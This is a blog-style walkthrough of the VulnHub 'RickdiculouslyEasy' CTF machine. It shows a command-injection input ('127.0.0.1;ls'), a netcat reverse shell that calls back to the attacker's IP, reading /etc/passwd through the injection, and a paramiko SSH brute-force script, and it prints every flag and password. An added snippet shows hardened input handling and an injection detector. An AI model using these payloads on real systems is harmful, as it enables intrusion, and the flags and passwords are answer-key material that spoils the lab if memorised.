What's up guys?
It's been a long time since I posted a new entry on my blog, but I'm back and going to do some CTF challenges from VulnHub (link: www.vulnhub.com). I picked the easiest one because I'm not really that good at CTF. After a while searching for a machine that fits my needs, I picked RickdiculouslyEasy (pun intended!).
From the description:
This is a fedora server vm, created with virtualbox. It is a very simple Rick and Morty themed boot to root. There are 130 points worth of flags available (each flag has its points recorded with it), you should also get root. It's designed to be a beginner ctf, if you're new to pen testing, check it out!
I downloaded the .vbox file and ran it in VirtualBox.
The machine is pretty neat because it shows its IP address straight away on the console, so I don't have to bother with a ping sweep. If you read the message, it says the admin console is on port 9090, so let's go to that port with a web browser.
Type: http://<ip address>:9090
At first you will get a warning that the certificate is not set up properly, so you just have to confirm the exception and move on.
flag 1: FLAG {There is no Zeus, in your face!} - 10 Points
Well, we got the first flag. Because there is a non-common port open on the machine, I presume there are many other non-common ports open too, so to save time I created a simple Python script that checks every port on the machine.
OK, so we got exactly 7 open ports on the machine. First let's go to port 21, File Transfer Protocol. I connected to the FTP server using the ftp utility in Linux.
Apparently the FTP server allows anonymous login for all visitors, so that's a good thing for us.
Yay! We found the second flag. First switch to binary mode in order to download the file from FTP.
flag 2: FLAG{Whoa this is unexpected} - 10 Points
Let's try to connect to the uncommon ports this time. I just picked 13337 from the list. You can connect to the port using the nc utility in Linux. There you go, we got the third flag.
flag 3: FLAG:{TheyFoundMyBackDoorMorty} - 10 Points
OK, so moving on, let's try to connect to the other uncommon port, 60000, also with the nc utility in Linux, and there you go again, we got the fourth flag.
flag 4: FLAG{Flip the pickle Morty!} - 10 Points
Move on to the last uncommon port, which is 22222. Same again, try nc. Hmmm, from the banner we got an SSH service running on port 22222, so I tried to connect to it with the ssh utility, but nothing came of it because I don't know the username or the password. So move on to the remaining ports, 22 and 80.
Let's try port 80. As you can see from the screenshot, the website shows a background of Rick. If you try to analyze the source code it doesn't give anything. So my advice to all of you: if you find nothing on the website, try to probe the robots.txt file. It may show you hidden directories of the website (for details on robots.txt visit this link: http://www.robotstxt.org/).
As you can see, it shows some interesting directories and files that we could explore. Long story short, there is nothing in the root_shell.cgi file, but something interesting comes out of tracertool.cgi: the page shows a tool to do trace routing.
For those of you who don't know what cgi-bin is for: cgi-bin simply lets you execute programs other than server-side scripting languages such as PHP, so if you put a program inside cgi-bin, such as a Ruby, Bash or Python script, it will get executed. But the problem with putting this kind of functionality on a website is that it lets an attacker do code injection, where the attacker can execute other commands inside the program.
Just as expected, the page can be exploited with code injection. The input "127.0.0.1;ls" lets you execute two commands, one executed by the page and one supplied by you, because the ";" symbol is used to separate multiple statements on one line, and since it is combined with the "ls" command it will execute the directory listing command too.
Now, because doing it manually by entering the IP address and appending a semicolon again and again would waste my time, I created a Python program that lets me just type a command at a prompt and returns the result.
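Here is an added example of mine, not the VM's tracertool.cgi or any code from this post, showing the vulnerable pattern that makes "127.0.0.1;ls" work next to the hardened form a defender would write; the traceroute binary, the function names and the request-log check are assumptions.

```python
import ipaddress
import shlex
import subprocess


def unsafe_command(host):
    # The vulnerable pattern: the whole string goes to a shell, so ';' in
    # host ends the traceroute command and starts a second one.
    return "traceroute " + host


def safe_argv(host):
    # Hardened form: the input must parse as an IP literal (allow-list), and
    # it is passed as its own argv element so no shell ever sees it.
    ipaddress.ip_address(host)  # raises ValueError on "127.0.0.1;ls"
    return ["traceroute", host]


def is_valid_host(host):
    # True when safe_argv accepts host, False when it rejects it
    try:
        safe_argv(host)
        return True
    except ValueError:
        return False


def run_traceroute(host):
    # shell=False with a validated argv list: separators like ';' are inert
    return subprocess.run(safe_argv(host), capture_output=True, text=True)


def looks_injected(host):
    # Detection helper for web/CGI request logs (assumed field name "host"):
    # shell metacharacters or more than one shell word point at injection.
    if any(c in host for c in ";|&`$()<>\n"):
        return True
    try:
        return len(shlex.split(host)) != 1
    except ValueError:  # unbalanced quotes are not a valid host either
        return True
```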
After running around the directories I found that there is a password directory, and in it I found FLAG.txt, but unfortunately every time I typed the cat command to see the content of the file it showed a cat picture.
So I just had to use another command to show the inside of the file. It is up to you what command you use; I just stuck with the "head" command.
We got the fifth flag.
flag 5: FLAG{Yeah d- just don't do it.} - 10 Points
Because my program could only send commands but couldn't maintain an interactive shell, I couldn't change directory freely. So I created a backdoor using the "nc" utility that connects back to me.
On your machine type: "nc -nvlp 4444"
In rootshell.cgi type: "127.0.0.1; nc -e /bin/bash <your ip address> 4444"
We got our backdoor. I noticed there is one more file beside FLAG.txt, so I tried to see the content of that file and found another password ("winter").
So I guess that is the password for one of the users on the machine. To obtain the list of users just enter "127.0.0.1; head -n 50 /etc/passwd" inside tracertool.cgi.
RickSanchez:x:1000:1000::/home/RickSanchez:/bin/bash
Morty:x:1001:1001::/home/Morty:/bin/bash
Summer:x:1002:1002::/home/Summer:/bin/bash
We got the following users. So after a couple of tries at SSH to port 22222 with username "Summer" and password "winter", I got a hit.
Walk through the directory and we got another flag.txt.
flag 6: FLAG{Get off the high road Summer!} - 10 Points
As you can see from the /etc/passwd file we saw, there are 3 users on the machine. I tried to enter one of their directories, starting with the Morty directory, and found two files: the first is a picture and the other is an encrypted zip file.
Looking at the file name you can see that the file obviously contains the password we need for opening the zip file. So just run the strings utility on the jpg file and we get the password.
flag 7: FLAG: {131333} - 20 Points
Hmmm, looking at the result, it could be a hint for the next flag, so let's go to another directory. When I arrived I found another executable file called "safe". First of all, you cannot execute it inside the machine, so you need to download it and change its permissions on your own machine. Trying to run it, I got a hint on how to use the executable: it needs to be given a parameter.
After a couple of tests I found the parameter is the 7th flag.
flag 8: FLAG{And Awwwaaaaayyyy we Go!} - 20 Points
As you can see, this is the last hint for the last flag, and it states what you need in order to get the password for user Rick.
After taking some time to research, I found the band name is "flesh curtains".
To save time I created a script to list all the possible passwords that could be made by combining these two words.
Save the result to a txt file to be used for the brute force. Now at this point you could use any password-cracking tool such as hydra, but I like to create my own tools. The following is the code that I created for launching a brute-force attack against the server.
import paramiko
import socket
import sys

def ssh_connect(target, port, username, password):
    # returns 0 on success, 1 on wrong credentials, 2 on a network error
    code = 0
    ssh_client = paramiko.SSHClient()
    ssh_client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
    try:
        ssh_client.connect(target, port=port, username=username, password=password)
    except paramiko.AuthenticationException:
        code = 1
    except socket.error:
        code = 2
    finally:
        ssh_client.close()
    return code

target = "192.168.1.7"  # change the ip address
username = "RickSanchez"
port = 22222
# the wordlist file is given as the first command line argument
with open(sys.argv[1], "r") as wordlist:
    for line in wordlist:
        password = line.rstrip("\n")
        print(password)
        if ssh_connect(target, port, username, password) == 0:
            print(username + ":" + password + " success")
            sys.exit(0)
The code above may not be as good as hydra, so if you don't want to waste time, I suggest you just use hydra. The password is P7Curtains.
I switched to RickSanchez and enumerated its permissions to check if it has root permission. As you can see, the user has root permission.
The next step is to use a root interactive shell to access the root directory and voilà, get the last flag. Congrats!
flag 9: FLAG: {Ionic Defibrillator} - 30 points